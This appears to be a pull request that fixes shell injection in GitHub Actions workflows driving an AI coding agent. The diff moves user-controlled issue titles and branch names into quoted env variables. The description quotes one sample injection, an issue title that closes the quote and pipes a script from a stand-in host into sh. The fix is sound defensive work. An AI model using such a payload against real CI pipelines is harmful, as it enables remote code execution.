### PR TITLE
fix: prevent shell injection in agent workflows

### DIFF
--- a/.github/workflows/agent-fix.yml
+++ b/.github/workflows/agent-fix.yml
@@ -39,25 +39,28 @@ jobs:
 
       - name: Check retry count
         id: retry
+        env:
+          HEAD_BRANCH: ${{ github.event.check_suite.head_branch }}
         run: |
-          BRANCH=${{ github.event.check_suite.head_branch }}
-          COUNT=$(git log --oneline --grep="fix: ci" origin/main..$BRANCH | wc -l | tr -d ' ')
-          echo "count=$COUNT" >> $GITHUB_OUTPUT
+          COUNT=$(git log --oneline --grep="fix: ci" "origin/main..$HEAD_BRANCH" | wc -l | tr -d ' ')
+          echo "count=$COUNT" >> "$GITHUB_OUTPUT"
           if [ "$COUNT" -ge 2 ]; then
-            echo "skip=true" >> $GITHUB_OUTPUT
+            echo "skip=true" >> "$GITHUB_OUTPUT"
           else
-            echo "skip=false" >> $GITHUB_OUTPUT
+            echo "skip=false" >> "$GITHUB_OUTPUT"
           fi
 
       - name: Run Maestro to fix CI
         if: steps.retry.outputs.skip == 'false'
+        env:
+          HEAD_BRANCH: ${{ github.event.check_suite.head_branch }}
         run: |
           claude --print \
             --allowedTools "Bash,Read,Write,Edit,Glob,Grep" \
             --max-turns 30 \
             "Read agents/maestro.md and CLAUDE.md for context.
 
-            The CI pipeline has failed on branch ${{ github.event.check_suite.head_branch }}.
+            The CI pipeline has failed on branch ${HEAD_BRANCH}.
             Run the tests locally to reproduce the failures:
             1. npm run test
             2. npm run test:e2e
@@ -68,14 +71,15 @@ jobs:
 
       - name: Comment on PR if max retries reached
         if: steps.retry.outputs.skip == 'true'
+        env:
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+          HEAD_BRANCH: ${{ github.event.check_suite.head_branch }}
         run: |
-          PR_NUMBER=$(gh pr list --head ${{ github.event.check_suite.head_branch }} --json number --jq '.[0].number')
+          PR_NUMBER=$(gh pr list --head "$HEAD_BRANCH" --json number --jq '.[0].number')
           if [ -n "$PR_NUMBER" ]; then
-            gh pr comment $PR_NUMBER \
+            gh pr comment "$PR_NUMBER" \
               --body "🤖 **Agent Fix Failed**
 
             The agent has attempted to fix CI failures 2 times without success.
             Human review is needed. Please check the failing tests and fix manually."
           fi
-        env:
-          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}

--- a/.github/workflows/agent-trigger.yml
+++ b/.github/workflows/agent-trigger.yml
@@ -33,37 +33,42 @@ jobs:
         run: npx prisma db push
 
       - name: Update labels
-        run: |
-          gh issue edit ${{ github.event.issue.number }} --add-label "agent-working" || true
-          gh issue edit ${{ github.event.issue.number }} --remove-label "agent-ready" || true
         env:
           GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+          ISSUE_NUM: ${{ github.event.issue.number }}
+        run: |
+          gh issue edit "$ISSUE_NUM" --add-label "agent-working" || true
+          gh issue edit "$ISSUE_NUM" --remove-label "agent-ready" || true
 
       - name: Fetch issue details
         id: issue
-        run: |
-          gh issue view ${{ github.event.issue.number }} --json title,body --jq '"\(.title)\n\n\(.body)"' > /tmp/issue-body.txt
         env:
           GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+          ISSUE_NUM: ${{ github.event.issue.number }}
+        run: |
+          gh issue view "$ISSUE_NUM" --json title,body --jq '"\(.title)\n\n\(.body)"' > /tmp/issue-body.txt
 
       - name: Run Maestro Agent
+        env:
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+          ISSUE_NUM: ${{ github.event.issue.number }}
         run: |
           claude --print \
             --allowedTools "Bash,Read,Write,Edit,Glob,Grep,Agent" \
             --max-turns 200 \
-            "Read agents/maestro.md for your instructions. Then implement the following GitHub Issue #${{ github.event.issue.number }}. The issue content is saved at /tmp/issue-body.txt — read it with the Read tool. Repository is already cloned. Create a feature branch, implement with TDD, run all tests, and push the branch."
-        env:
-          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+            "Read agents/maestro.md for your instructions. Then implement the following GitHub Issue #${ISSUE_NUM}. The issue content is saved at /tmp/issue-body.txt — read it with the Read tool. Repository is already cloned. Create a feature branch, implement with TDD, run all tests, and push the branch."
 
       - name: Create PR if branch was pushed
+        env:
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+          ISSUE_TITLE: ${{ github.event.issue.title }}
+          ISSUE_NUM: ${{ github.event.issue.number }}
         run: |
           BRANCH=$(git branch --show-current)
           if [ "$BRANCH" != "main" ] && [ -n "$BRANCH" ]; then
             # Check if PR already exists for this branch
             EXISTING_PR=$(gh pr list --head "$BRANCH" --json number --jq '.[0].number' 2>/dev/null)
             if [ -z "$EXISTING_PR" ]; then
-              ISSUE_TITLE="${{ github.event.issue.title }}"
-              ISSUE_NUM="${{ github.event.issue.number }}"
               gh pr create \
                 --title "feat: ${ISSUE_TITLE} (closes #${ISSUE_NUM})" \
                 --body "## Summary
@@ -79,23 +84,23 @@ jobs:
                 --head "$BRANCH"
             fi
           fi
-          gh issue edit ${{ github.event.issue.number }} --remove-label "agent-working" || true
-        env:
-          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+          gh issue edit "$ISSUE_NUM" --remove-label "agent-working" || true
 
       - name: Handle failure
         if: failure()
+        env:
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+          ISSUE_NUM: ${{ github.event.issue.number }}
+          RUN_URL: ${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}
         run: |
-          gh issue comment ${{ github.event.issue.number }} \
+          gh issue comment "$ISSUE_NUM" \
             --body "🤖 **Agent Pipeline Failed**
 
           The Maestro agent encountered an error while processing this issue.
-          Please check the [workflow run](${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}) for details.
+          Please check the [workflow run](${RUN_URL}) for details.
 
           Adding \`agent-blocked\` label for human review."
 
-          gh issue edit ${{ github.event.issue.number }} \
+          gh issue edit "$ISSUE_NUM" \
             --add-label "agent-blocked" \
             --remove-label "agent-working"
-        env:
-          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}


### PR DESCRIPTION
## Summary
Closes the shell injection hole that bit us on issue #40. User-controlled fields from the GitHub event payload (issue title, branch name) were being interpolated via `\${{ ... }}` directly into shell scripts — both unsafe and fragile.

## Root cause (from #40)
The step that opens the PR did:
```yaml
ISSUE_TITLE="${{ github.event.issue.title }}"
```
When the issue title contained double quotes (`Landing page "Cardápio Rápido" na raiz do site`), GitHub Actions substituted the raw string into the shell script, breaking the quoting and causing `gh pr create` to exit 127. The same pattern would execute arbitrary commands if an issue title were `"; curl evil.sh|sh #`.

## Fix
Switch to the safe pattern — pass the value via `env:` and reference it as `"$VAR"` in the script. The Actions runtime sets it as a regular env var; the shell never re-parses the literal.

## Changed steps
**agent-trigger.yml** — Update labels, Fetch issue details, Run Maestro Agent, Create PR if branch was pushed, Handle failure

**agent-fix.yml** — Check retry count, Run Maestro to fix CI, Comment on PR if max retries reached

## Test plan
- [ ] Label a test issue with `agent-ready` whose title contains quotes/backticks/`;` and confirm the workflow completes and opens a PR
- [ ] Trigger agent-fix flow (push a failing commit to a `feature/*` branch) and confirm it still runs

Related: #40, #45